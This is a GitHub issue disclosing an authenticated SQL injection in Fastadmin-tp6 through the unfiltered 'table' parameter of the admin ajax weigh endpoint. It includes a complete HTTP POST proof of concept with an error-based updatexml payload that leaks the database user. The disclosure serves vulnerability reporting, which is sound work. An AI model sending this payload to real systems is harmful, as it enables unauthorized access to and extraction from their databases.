Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fastadmin-tp6 SQL injection #2

Open
0xzmz opened this issue Dec 30, 2019 · 0 comments
Open

Fastadmin-tp6 SQL injection #2

0xzmz opened this issue Dec 30, 2019 · 0 comments

Comments

@0xzmz
Copy link

0xzmz commented Dec 30, 2019

When a user with administrator rights has logged in the background, SQL injection can be performed during sorting by constructing malicious data.
In file app/admin/controller/Ajax.php line 145,the 'table' parameter passed in here is not filtered,so we can pass a malicious parameter for SQL injection.
POC:

POST /admin/ajax/weigh HTTP/1.1
Host: ***.***
Connection: close
Content-Length: 122
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


ids=1&changeid=8&pid=3&field=weigh&orderway=desc&table=user_rule where if(1=2,1,updatexml(1,concat(0x7e,user(),0x7e),1))--

Example:
Fastadmin SQL Injection

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant